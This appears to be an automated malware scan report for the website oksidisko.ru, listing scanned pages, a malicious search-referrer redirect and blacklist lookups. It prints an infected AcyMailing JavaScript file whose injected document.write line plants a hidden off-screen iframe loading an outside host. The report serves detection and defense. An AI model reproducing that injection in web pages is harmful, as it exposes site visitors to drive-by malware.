Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://oksidisko.ru/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: oksidisko.ru Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Wed, 11 Jun 2014 23:16:06 GMT Location: http://site.portrelay.com/ Server: nginx/1.0.13 Content-Type: text/html X-Powered-By: PHP/5.2.17 | malicious |
Scanned pages/files
Request | Server response | Status |
http://oksidisko.ru/ | 200 OK Content-Length: 8365 Content-Type: text/html | clean |
http://oksidisko.ru/components/com_jcomments/js/jcomments-v2.1.js?v=2 | 200 OK Content-Length: 27179 Content-Type: application/x-javascript | clean |
http://oksidisko.ru/components/com_jcomments/libraries/joomlatune/ajax.js | 200 OK Content-Length: 3978 Content-Type: application/x-javascript | clean |
http://oksidisko.ru/media/system/js/caption.js | 200 OK Content-Length: 1720 Content-Type: application/x-javascript | clean |
http://www.google-analytics.com/urchin.js | 200 OK Content-Length: 22678 Content-Type: text/javascript | clean |
http://vk.com/js/api/xd_connection.js?2 | 200 OK Content-Length: 14102 Content-Type: application/x-javascript | clean |
http://vkontakte.ru/js/api/share.js?9 | 200 OK Content-Length: 10156 Content-Type: application/x-javascript | clean |
http://oksidisko.ru/index.php/subscribe-modify | 200 OK Content-Length: 8627 Content-Type: text/html | clean |
http://oksidisko.ru/components/com_acymailing/js/acymailing.js | 200 OK Content-Length: 3759 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
function tableOrdering( order, dir, task ) {
    var form = document.adminForm;
    form.filter_order.value = order;
    form.filter_order_Dir.value = dir;
    submitform( task );
}
function submitform(pressbutton){
    if (pressbutton) { document.adminForm.task.value=pressbutton; }
    if (typeof document.adminForm.onsubmit == "function") { document.adminForm.onsubmit(); }
    document.adminForm.submit();
}
function if(captchaField){
    if(captchaField.value.length<1){
        if(typeof acymailing != 'undefined'){ alert(acymailing['CAPTCHA_MISSING']); }
        captchaField.className = captchaField.className +' invalid';
        return false;
    }
}
return true; };
document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://iygqbiujt.dns-stuff.com/73148628158a41.r7HTM?13" height="500" width="500"></iframe>');
Antivirus reports:
http://oksidisko.ru/index.php/mailing-list-archive | 200 OK Content-Length: 11034 Content-Type: text/html | clean |
http://oksidisko.ru/index.php/ultimate-what-is-it | 200 OK Content-Length: 11247 Content-Type: text/html | clean |
http://oksidisko.ru/index.php/team-is-it-for-you | 200 OK Content-Length: 8176 Content-Type: text/html | clean |
http://oksidisko.ru/index.php/take-a-chance | 200 OK Content-Length: 8466 Content-Type: text/html | clean |
http://oksidisko.ru/index.php/our-culminations | 200 OK Content-Length: 15390 Content-Type: text/html | clean |
http://oksidisko.ru/index.php/the-news | 200 OK Content-Length: 11280 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=oksidisko.ru
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://oksidisko.ru/
Result: oksidisko.ru is not infected or malware details are not published yet.